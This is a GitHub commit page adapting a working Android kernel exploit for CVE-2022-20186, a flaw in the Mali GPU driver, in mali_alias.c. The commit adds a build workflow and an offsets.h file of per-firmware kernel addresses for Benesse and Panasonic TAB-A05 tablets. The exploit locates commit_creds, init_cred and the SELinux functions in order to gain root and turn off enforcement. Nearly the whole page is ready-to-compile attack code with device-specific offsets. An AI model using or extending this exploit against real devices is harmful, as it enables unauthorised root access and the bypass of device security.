Skip to content

Commit

Permalink
No commit message
Browse files Browse the repository at this point in the history
  • Loading branch information
@s1204IT
s1204IT committed Jun 28, 2024
1 parent abd0914 commit 9cad991
Show file tree
Hide file tree
Showing 4 changed files with 256 additions and 57 deletions.
27 changes: 27 additions & 0 deletions .github/workflows/compile.yml
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,27 @@
name: Compile

on:
push:
paths:
- '*.c'
- '*.h'
- '.github/workflows/compile.yml'
workflow_dispatch:

jobs:
compile:
name: Compile
runs-on: ubuntu-latest

steps:
- name: Checkout
uses: actions/checkout@v4

- name: Compile
run: $ANDROID_NDK/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android28-clang mali_alias.c -o mali_alias

- name: Uplaod
uses: actions/upload-artifact@v4
with:
name: CVE-2022-20186
path: mali_alias
1 change: 1 addition & 0 deletions .gitignore
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
/mali_alias
159 changes: 102 additions & 57 deletions mali_alias.c
View file
Original file line number Diff line number Diff line change
@@ -1,6 +1,7 @@
#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
Expand All @@ -11,8 +12,7 @@
#include <sys/wait.h>
#include <sys/system_properties.h>

#include "stdbool.h"

#include "offsets.h"
#include "mali.h"
#include "mali_base_jm_kernel.h"
#include "midgard.h"
Expand All @@ -27,11 +27,11 @@

#define POOL_SIZE 16384

#define RESERVED_SIZE 32
#define RESERVED_SIZE 12

#define TOTAL_RESERVED_SIZE 1024

#define KERNEL_BASE 0x80000000
#define KERNEL_BASE 0x40008000

#define OVERWRITE_INDEX 256

Expand All @@ -43,45 +43,9 @@

#define ADD_COMMIT_INDEX 3

#define AVC_DENY_2108 0x92df1c

#define SEL_READ_ENFORCE_2108 0x942ae4

#define INIT_CRED_2108 0x29a0570

#define COMMIT_CREDS_2108 0x180b0c

#define ADD_INIT_2108 0x9115c000

#define ADD_COMMIT_2108 0x912c3108

#define AVC_DENY_2201 0x930af4

#define SEL_READ_ENFORCE_2201 0x9456bc

#define INIT_CRED_2201 0x29b0570

#define COMMIT_CREDS_2201 0x183df0

#define ADD_INIT_2201 0x9115c000

#define ADD_COMMIT_2201 0x9137c108

#define AVC_DENY_2202 0x930b50

#define SEL_READ_ENFORCE_2202 0x94551c

#define INIT_CRED_2202 0x29b0570
static uint64_t sel_read_enforce;

#define COMMIT_CREDS_2202 0x183e3c

#define ADD_INIT_2202 0x9115c000 //add x0, x0, #0x570

#define ADD_COMMIT_2202 0x9138f108 //add x8, x8, #0xe3c

static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2108;

static uint64_t avc_deny = AVC_DENY_2108;
static uint64_t avc_deny;

static int atom_number = 1;

Expand Down Expand Up @@ -252,7 +216,7 @@ void write_to(int mali_fd, uint64_t gpu_addr, uint64_t value, int atom_number, e
struct MALI_JOB_HEADER jh = {0};
jh.is_64b = true;
jh.type = MALI_JOB_TYPE_WRITE_VALUE;

struct MALI_WRITE_VALUE_JOB_PAYLOAD payload = {0};
payload.type = type;
payload.immediate_value = value;
Expand Down Expand Up @@ -375,24 +339,105 @@ void select_offset() {
char fingerprint[256];
int len = __system_property_get("ro.build.fingerprint", fingerprint);
printf("fingerprint: %s\n", fingerprint);
if (!strcmp(fingerprint, "google/oriole/oriole:12/SD1A.210817.037/7862242:user/release-keys")) {
avc_deny = AVC_DENY_2108;
sel_read_enforce = SEL_READ_ENFORCE_2108;
fixup_root_shell(INIT_CRED_2108, COMMIT_CREDS_2108, SEL_READ_ENFORCE_2108, ADD_INIT_2108, ADD_COMMIT_2108);

if(!strcmp(fingerprint, CTX_00_04_000)) {
avc_deny = AVC_DENY_CTX_00_04_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_04_000;
fixup_root_shell(INIT_CRED_CTX_00_04_000, COMMIT_CREDS_CTX_00_04_000, SEL_READ_ENFORCE_CTX_00_04_000, ADD_INIT_CTX_00_04_000, ADD_COMMIT_CTX_00_04_000);
return;
}

if(!strcmp(fingerprint, CTX_00_05_000)) {
avc_deny = AVC_DENY_CTX_00_05_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_05_000;
fixup_root_shell(INIT_CRED_CTX_00_05_000, COMMIT_CREDS_CTX_00_05_000, SEL_READ_ENFORCE_CTX_00_05_000, ADD_INIT_CTX_00_05_000, ADD_COMMIT_CTX_00_05_000);
return;
}

if(!strcmp(fingerprint, CTX_00_08_000)) {
avc_deny = AVC_DENY_CTX_00_08_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_08_000;
fixup_root_shell(INIT_CRED_CTX_00_08_000, COMMIT_CREDS_CTX_00_08_000, SEL_READ_ENFORCE_CTX_00_08_000, ADD_INIT_CTX_00_08_000, ADD_COMMIT_CTX_00_08_000);
return;
}

if(!strcmp(fingerprint, CTX_00_09_000)) {
avc_deny = AVC_DENY_CTX_00_09_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_00_09_000;
fixup_root_shell(INIT_CRED_CTX_00_09_000, COMMIT_CREDS_CTX_00_09_000, SEL_READ_ENFORCE_CTX_00_09_000, ADD_INIT_CTX_00_09_000, ADD_COMMIT_CTX_00_09_000);
return;
}

if(!strcmp(fingerprint, CTX_01_00_000)) {
avc_deny = AVC_DENY_CTX_01_00_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_00_000;
fixup_root_shell(INIT_CRED_CTX_01_00_000, COMMIT_CREDS_CTX_01_00_000, SEL_READ_ENFORCE_CTX_01_00_000, ADD_INIT_CTX_01_00_000, ADD_COMMIT_CTX_01_00_000);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220105.007/8030436:user/release-keys")) {
avc_deny = AVC_DENY_2201;
sel_read_enforce = SEL_READ_ENFORCE_2201;
fixup_root_shell(INIT_CRED_2201, COMMIT_CREDS_2201, SEL_READ_ENFORCE_2201, ADD_INIT_2201, ADD_COMMIT_2201);

if(!strcmp(fingerprint, CTX_01_01_001)) {
avc_deny = AVC_DENY_CTX_01_01_001;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_01_001;
fixup_root_shell(INIT_CRED_CTX_01_01_001, COMMIT_CREDS_CTX_01_01_001, SEL_READ_ENFORCE_CTX_01_01_001, ADD_INIT_CTX_01_01_001, ADD_COMMIT_CTX_01_01_001);
return;
}

if(!strcmp(fingerprint, CTX_01_04_000)) {
avc_deny = AVC_DENY_CTX_01_04_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_04_000;
fixup_root_shell(INIT_CRED_CTX_01_04_000, COMMIT_CREDS_CTX_01_04_000, SEL_READ_ENFORCE_CTX_01_04_000, ADD_INIT_CTX_01_04_000, ADD_COMMIT_CTX_01_04_000);
return;
}
if (!strcmp(fingerprint, "google/oriole/oriole:12/SQ1D.220205.004/8151327:user/release-keys")) {
avc_deny = AVC_DENY_2202;
sel_read_enforce = SEL_READ_ENFORCE_2202;
fixup_root_shell(INIT_CRED_2202, COMMIT_CREDS_2202, SEL_READ_ENFORCE_2202, ADD_INIT_2202, ADD_COMMIT_2202);

if(!strcmp(fingerprint, CTX_01_11_000)) {
avc_deny = AVC_DENY_CTX_01_11_000;
sel_read_enforce = SEL_READ_ENFORCE_CTX_01_11_000;
fixup_root_shell(INIT_CRED_CTX_01_11_000, COMMIT_CREDS_CTX_01_11_000, SEL_READ_ENFORCE_CTX_01_11_000, ADD_INIT_CTX_01_11_000, ADD_COMMIT_CTX_01_11_000);
return;
}

if(!strcmp(fingerprint, CTZ_00_03_000)) {
avc_deny = AVC_DENY_CTZ_00_03_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_00_03_000;
fixup_root_shell(INIT_CRED_CTZ_00_03_000, COMMIT_CREDS_CTZ_00_03_000, SEL_READ_ENFORCE_CTZ_00_03_000, ADD_INIT_CTZ_00_03_000, ADD_COMMIT_CTZ_00_03_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_00_000)) {
avc_deny = AVC_DENY_CTZ_01_00_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_00_000;
fixup_root_shell(INIT_CRED_CTZ_01_00_000, COMMIT_CREDS_CTZ_01_00_000, SEL_READ_ENFORCE_CTZ_01_00_000, ADD_INIT_CTZ_01_00_000, ADD_COMMIT_CTZ_01_00_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_01_000)) {
avc_deny = AVC_DENY_CTZ_01_01_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_01_000;
fixup_root_shell(INIT_CRED_CTZ_01_01_000, COMMIT_CREDS_CTZ_01_01_000, SEL_READ_ENFORCE_CTZ_01_01_000, ADD_INIT_CTZ_01_01_000, ADD_COMMIT_CTZ_01_01_000);
return;
}

if(!strcmp(fingerprint, CTZ_01_02_004)) {
avc_deny = AVC_DENY_CTZ_01_02_004;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_004;
fixup_root_shell(INIT_CRED_CTZ_01_02_004, COMMIT_CREDS_CTZ_01_02_004, SEL_READ_ENFORCE_CTZ_01_02_004, ADD_INIT_CTZ_01_02_004, ADD_COMMIT_CTZ_01_02_004);
return;
}

if(!strcmp(fingerprint, CTZ_01_02_005)) {
avc_deny = AVC_DENY_CTZ_01_02_005;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_02_005;
fixup_root_shell(INIT_CRED_CTZ_01_02_005, COMMIT_CREDS_CTZ_01_02_005, SEL_READ_ENFORCE_CTZ_01_02_005, ADD_INIT_CTZ_01_02_005, ADD_COMMIT_CTZ_01_02_005);
return;
}

if(!strcmp(fingerprint, CTZ_01_03_000)) {
avc_deny = AVC_DENY_CTZ_01_03_000;
sel_read_enforce = SEL_READ_ENFORCE_CTZ_01_03_000;
fixup_root_shell(INIT_CRED_CTZ_01_03_000, COMMIT_CREDS_CTZ_01_03_000, SEL_READ_ENFORCE_CTZ_01_03_000, ADD_INIT_CTZ_01_03_000, ADD_COMMIT_CTZ_01_03_000);
return;
}

err(1, "unable to match build id\n");
}

Expand Down Expand Up @@ -491,11 +536,11 @@ int run_exploit() {
int main() {
setbuf(stdout, NULL);
setbuf(stderr, NULL);

select_offset();

int ret = -1;
sleep(1);
ret = run_exploit();
if (!ret) system("sh");
if (!ret) system("getenforce");
}
126 changes: 126 additions & 0 deletions offsets.h
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,126 @@

// TAB-A05-BD 00.04.000
#define CTX_00_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.04.000/00.04.000:user/release-keys"
#define COMMIT_CREDS_CTX_00_04_000 0x5a120
#define AVC_DENY_CTX_00_04_000 0x35acc8
#define SEL_READ_ENFORCE_CTX_00_04_000 0x3653a8
#define INIT_CRED_CTX_00_04_000 0x11553f0
#define ADD_INIT_CTX_00_04_000 0x910fc000
#define ADD_COMMIT_CTX_00_04_000 0x91048108

// TAB-A05-BD 00.05.000
#define CTX_00_05_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.05.000/00.05.000:user/release-keys"
#define COMMIT_CREDS_CTX_00_05_000 0x5a120
#define AVC_DENY_CTX_00_05_000 0x35acc8
#define SEL_READ_ENFORCE_CTX_00_05_000 0x3653a8
#define INIT_CRED_CTX_00_05_000 0x11553f0
#define ADD_INIT_CTX_00_05_000 0x910fc000
#define ADD_COMMIT_CTX_00_05_000 0x91048108

// TAB-A05-BD 00.08.000
#define CTX_00_08_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.08.000/00.08.000:user/release-keys"
#define COMMIT_CREDS_CTX_00_08_000 0x5a120
#define AVC_DENY_CTX_00_08_000 0x35acc8
#define SEL_READ_ENFORCE_CTX_00_08_000 0x3653a8
#define INIT_CRED_CTX_00_08_000 0x11553f0
#define ADD_INIT_CTX_00_08_000 0x910fc000
#define ADD_COMMIT_CTX_00_08_000 0x91048108

// TAB-A05-BD 00.09.000
#define CTX_00_09_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/00.09.000/00.09.000:user/release-keys"
#define COMMIT_CREDS_CTX_00_09_000 0x5a120
#define AVC_DENY_CTX_00_09_000 0x35acc8
#define SEL_READ_ENFORCE_CTX_00_09_000 0x3653a8
#define INIT_CRED_CTX_00_09_000 0x11553f0
#define ADD_INIT_CTX_00_09_000 0x910fc000
#define ADD_COMMIT_CTX_00_09_000 0x91048108

// TAB-A05-BD 01.00.000
#define CTX_01_00_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.00.000/01.00.000:user/release-keys"
#define COMMIT_CREDS_CTX_01_00_000 0x5a120
#define AVC_DENY_CTX_01_00_000 0x35acc8
#define SEL_READ_ENFORCE_CTX_01_00_000 0x3653a8
#define INIT_CRED_CTX_01_00_000 0x11553f0
#define ADD_INIT_CTX_01_00_000 0x910fc000
#define ADD_COMMIT_CTX_01_00_000 0x91048108

// TAB-A05-BD 01.01.001
#define CTX_01_01_001 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.01.001/01.01.001:user/release-keys"
#define COMMIT_CREDS_CTX_01_01_001 0x5a120
#define AVC_DENY_CTX_01_01_001 0x35acc8
#define SEL_READ_ENFORCE_CTX_01_01_001 0x365418
#define INIT_CRED_CTX_01_01_001 0x11653f0
#define ADD_INIT_CTX_01_01_001 0x910fc000
#define ADD_COMMIT_CTX_01_01_001 0x91048108

// TAB-A05-BD 01.04.000
#define CTX_01_04_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.04.000/01.04.000:user/release-keys"
#define COMMIT_CREDS_CTX_01_04_000 0x5a120
#define AVC_DENY_CTX_01_04_000 0x35ac10
#define SEL_READ_ENFORCE_CTX_01_04_000 0x365360
#define INIT_CRED_CTX_01_04_000 0x11653f0
#define ADD_INIT_CTX_01_04_000 0x910fc000
#define ADD_COMMIT_CTX_01_04_000 0x91048108

// TAB-A05-BD 01.11.000
#define CTX_01_11_000 "benesse/TAB-A05-BD/TAB-A05-BD:9/01.11.000/01.11.000:user/release-keys"
#define COMMIT_CREDS_CTX_01_11_000 0x5a120
#define AVC_DENY_CTX_01_11_000 0x359c20
#define SEL_READ_ENFORCE_CTX_01_11_000 0x364370
#define INIT_CRED_CTX_01_11_000 0x11653f0
#define ADD_INIT_CTX_01_11_000 0x910fc000
#define ADD_COMMIT_CTX_01_11_000 0x91048108

// TAB-A05-BA1 00.03.000
#define CTZ_00_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/00.03.000/00.03.000:user/release-keys"
#define COMMIT_CREDS_CTZ_00_03_000 0x5a120
#define AVC_DENY_CTZ_00_03_000 0x359c20
#define SEL_READ_ENFORCE_CTZ_00_03_000 0x364370
#define INIT_CRED_CTZ_00_03_000 0x11753f0
#define ADD_INIT_CTZ_00_03_000 0x910fc000
#define ADD_COMMIT_CTZ_00_03_000 0x91048108

// TAB-A05-BA1 01.00.000
#define CTZ_01_00_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.00.000/01.00.000:user/release-keys"
#define COMMIT_CREDS_CTZ_01_00_000 0x5a120
#define AVC_DENY_CTZ_01_00_000 0x359c20
#define SEL_READ_ENFORCE_CTZ_01_00_000 0x364370
#define INIT_CRED_CTZ_01_00_000 0x11653f0
#define ADD_INIT_CTZ_01_00_000 0x910fc000
#define ADD_COMMIT_CTZ_01_00_000 0x91048108

// TAB-A05-BA1 01.01.000
#define CTZ_01_01_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.01.000/01.01.000:user/release-keys"
#define COMMIT_CREDS_CTZ_01_01_000 0x5a120
#define AVC_DENY_CTZ_01_01_000 0x359a68
#define SEL_READ_ENFORCE_CTZ_01_01_000 0x3641b8
#define INIT_CRED_CTZ_01_01_000 0x11653f0
#define ADD_INIT_CTZ_01_01_000 0x910fc000
#define ADD_COMMIT_CTZ_01_01_000 0x91048108

// TAB-A05-BA1 01.02.004
#define CTZ_01_02_004 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.004/01.02.004:user/release-keys"
#define COMMIT_CREDS_CTZ_01_02_004 0x5a120
#define AVC_DENY_CTZ_01_02_004 0x35bad0
#define SEL_READ_ENFORCE_CTZ_01_02_004 0x366190
#define INIT_CRED_CTZ_01_02_004 0x11a53f0
#define ADD_INIT_CTZ_01_02_004 0x910fc000
#define ADD_COMMIT_CTZ_01_02_004 0x91048108

// TAB-A05-BA1 01.02.005
#define CTZ_01_02_005 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.02.005/01.02.005:user/release-keys"
#define COMMIT_CREDS_CTZ_01_02_005 0x5a120
#define AVC_DENY_CTZ_01_02_005 0x35bad0
#define SEL_READ_ENFORCE_CTZ_01_02_005 0x366190
#define INIT_CRED_CTZ_01_02_005 0x11a53f0
#define ADD_INIT_CTZ_01_02_005 0x910fc000
#define ADD_COMMIT_CTZ_01_02_005 0x91048108

// TAB-A05-BA1 01.03.000
#define CTZ_01_03_000 "Panasonic/TAB-A05-BA1/TAB-A05-BA1:9/01.03.000/01.03.000:user/release-keys"
#define COMMIT_CREDS_CTZ_01_03_000 0x5a120
#define AVC_DENY_CTZ_01_03_000 0x35bad0
#define SEL_READ_ENFORCE_CTZ_01_03_000 0x366190
#define INIT_CRED_CTZ_01_03_000 0x11a53f0
#define ADD_INIT_CTZ_01_03_000 0x910fc000
#define ADD_COMMIT_CTZ_01_03_000 0x91048108

0 comments on commit 9cad991

Please sign in to comment.